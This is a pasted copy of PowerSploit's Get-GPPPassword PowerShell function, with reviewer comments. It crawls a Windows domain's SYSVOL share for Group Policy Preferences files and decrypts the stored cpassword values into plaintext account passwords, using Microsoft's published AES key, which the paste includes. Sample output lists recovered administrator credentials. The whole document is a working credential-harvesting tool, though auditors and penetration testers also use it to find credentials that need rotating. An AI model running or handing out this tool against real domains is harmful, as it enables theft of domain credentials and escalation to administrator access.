
wow

a guest
Jul 17th, 2017
function Get-GPPPassword {
<#
.SYNOPSIS

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Get-GPPPassword searches the SYSVOL share of a domain controller for Groups.xml, Services.xml,
Scheduledtasks.xml, DataSources.xml, Printers.xml and Drives.xml, decrypts every "cpassword"
attribute found in them and returns one object per file holding the plaintext passwords, the
associated account names, the "changed" timestamps and the file path.

Only files the calling user can read are inspected (access-denied errors are silently skipped),
so the result is a lower bound on what is actually stored in SYSVOL.

.PARAMETER Server

The domain controller or domain DNS name whose \\<Server>\SYSVOL share is searched.
Defaults to the user's current domain ($Env:USERDNSDOMAIN).

.EXAMPLE

PS C:\> Get-GPPPassword

NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml

NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

NewName : [BLANK]
Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
Passwords : {password, password1234$}
UserNames : {administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml

NewName : [BLANK]
Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
Passwords : {password, read123}
UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml

.EXAMPLE
PS C:\> Get-GPPPassword -Server EXAMPLE.COM

NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml

NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml

.EXAMPLE

PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!

.NOTES

A cpassword value is AES-256 encrypted with a fixed key that Microsoft published in its Group
Policy Preferences documentation, so anyone who can read SYSVOL (authenticated domain users, by
default) can recover the password. Microsoft's MS14-025 update stops the Group Policy editor from
creating new preference items that carry a cpassword, but items created before the update stay in
SYSVOL until an administrator removes them. Each object this function returns therefore identifies
a preference item that should be deleted and a credential that should be rotated.

.LINK

http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
#>

    [CmdletBinding()]
    Param (
        [ValidateNotNullOrEmpty()]
        [String]
        $Server = $Env:USERDNSDOMAIN
    )

    # Some XML issues between versions. Strict mode also turns references to
    # uninitialised variables into errors for this scope and its children.
    Set-StrictMode -Version 2

    # Helper: base64-decodes one GPP "cpassword" attribute value and decrypts it.
    #   $Cpassword - the raw attribute value as stored in the XML file
    #   Returns the plaintext password as a string. On any failure an error
    #   record is written and nothing is returned.
    function Get-DecryptedCpassword {
        [CmdletBinding()]
        Param (
            [string] $Cpassword
        )

        try {
            # The stored value lacks '=' padding; restore it from the length so
            # [Convert]::FromBase64String accepts the string.
            $Mod = ($Cpassword.length % 4)

            # NOTE(review): $Mod is an [int] while the case labels are strings;
            # the match relies on switch converting the label to the value's type.
            switch ($Mod) {
                # A length of 1 mod 4 is never valid base64: drop the stray
                # trailing character instead of padding.
                '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
                '2' {$Cpassword += ('=' * (4 - $Mod))}
                '3' {$Cpassword += ('=' * (4 - $Mod))}
            }

            $Base64Decoded = [Convert]::FromBase64String($Cpassword)

            # AES with the fixed 32-byte (AES-256) key Microsoft documented for
            # GPP; the cipher mode is left at the provider default (CBC). The key
            # is the same in every domain, which is why a cpassword protects
            # nothing against anyone who can read the file.
            $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
            [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                                 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

            # All-zero IV: the IV is implicit, it is not stored alongside the
            # ciphertext, so the provider must not generate a random one.
            $AesIV = New-Object Byte[]($AesObject.IV.Length)
            $AesObject.IV = $AesIV
            $AesObject.Key = $AesKey
            # NOTE(review): neither the provider nor the decryptor is disposed;
            # acceptable for a one-shot call, but worth a try/finally if reused.
            $DecryptorObject = $AesObject.CreateDecryptor()
            [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

            # The decrypted bytes are the password encoded as UTF-16LE.
            return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
        }

        # Report the most recent error record and fall through with no output;
        # the caller then simply gets no value for this cpassword.
        catch {Write-Error $Error[0]}
    }

    # Helper: extracts the credential-bearing fields from one preference XML file.
    #   $File - full path of the XML file (untyped; a string path is expected)
    #   Returns a PSObject with Passwords, UserNames, Changed, NewName and File.
    #   Each of the first four is an array of values, or the string '[BLANK]'
    #   when the file yielded none, so a file without any cpassword attribute
    #   is still reported with '[BLANK]' fields. On any failure an error record
    #   is written and nothing is returned.
    function Get-GPPInnerFields {
        [CmdletBinding()]
        Param (
            $File
        )

        try {

            $Filename = Split-Path $File -Leaf
            # Parses the whole file as XML; a malformed file throws here and is
            # reported by the catch below.
            [xml] $Xml = Get-Content ($File)

            # Declare empty arrays; one entry per preference item found.
            $Cpassword = @()
            $UserName = @()
            $NewName = @()
            $Changed = @()
            $Password = @()

            # Cheap substring pre-check (-like is case-insensitive) before
            # running any XPath queries.
            if ($Xml.innerxml -like "*cpassword*"){

                Write-Verbose "Potential password in $File"

                # Each preference type stores the account under a different
                # attribute name, and only Groups.xml carries a newName.
                # switch on a string is case-insensitive, so 'Scheduledtasks.xml'
                # also matches a file named ScheduledTasks.xml.
                switch ($Filename) {

                    'Groups.xml' {
                        # NOTE(review): "+= ," appends the pipeline's output (the
                        # attribute values) to the array; the unary comma wraps
                        # $Xml in a one-element array before it enters the
                        # pipeline and appears to be a no-op — confirm intent.
                        $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                    }

                    'Services.xml' {
                        $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                    }

                    'Scheduledtasks.xml' {
                        $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                    }

                    'DataSources.xml' {
                        $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                    }

                    'Printers.xml' {
                        $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                    }

                    'Drives.xml' {
                        $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                        $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                    }
                }
            }

            # Decrypt every cpassword collected above. A cpassword that fails to
            # decrypt contributes nothing (the helper writes an error instead),
            # so $Password can be shorter than $UserName.
            foreach ($Pass in $Cpassword) {
                Write-Verbose "Decrypting $Pass"
                $DecryptedPassword = Get-DecryptedCpassword $Pass
                Write-Verbose "Decrypted a password of $DecryptedPassword"
                # append any new passwords to array
                $Password += , $DecryptedPassword
            }

            # Put [BLANK] in variables: an empty array is falsy, so each field
            # that collected nothing becomes the literal string '[BLANK]'.
            if (!($Password)) {$Password = '[BLANK]'}
            if (!($UserName)) {$UserName = '[BLANK]'}
            if (!($Changed)) {$Changed = '[BLANK]'}
            if (!($NewName)) {$NewName = '[BLANK]'}

            # Create custom object to output results (one object per file).
            $ObjectProperties = @{'Passwords' = $Password;
                                  'UserNames' = $UserName;
                                  'Changed' = $Changed;
                                  'NewName' = $NewName;
                                  'File' = $File}

            $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
            Write-Verbose "The password is between {} and may be more than one value."
            if ($ResultsObject) {Return $ResultsObject}
        }

        # Report the most recent error record; the file is then skipped.
        catch {Write-Error $Error[0]}
    }

    try {
        # Ensure that the machine is domain joined and the script is running as
        # a domain account; the default -Server value also depends on USERDNSDOMAIN.
        if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
            throw 'Machine is not a domain member or User is not a member of the domain.'
        }

        # Discover potential files containing passwords; not complaining in case
        # of denied access to a directory. Only the six preference file types
        # that Get-GPPInnerFields knows how to parse are collected.
        Write-Verbose "Searching \\$Server\SYSVOL. This could take a while."
        $XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'

        if ( -not $XMlFiles ) {throw 'No preference files found.'}

        # Variable names are case-insensitive: $XMlFiles and $XMLFiles are the
        # same variable.
        Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."

        # Emit one result object per file (function names are case-insensitive
        # as well, so Get-GppInnerFields resolves to the helper above).
        foreach ($File in $XMLFiles) {
            $Result = (Get-GppInnerFields $File.Fullname)
            Write-Output $Result
        }
    }

    # Any failure in the outer search is reported as an error record; partial
    # results already written to the pipeline are not retracted.
    catch {Write-Error $Error[0]}
}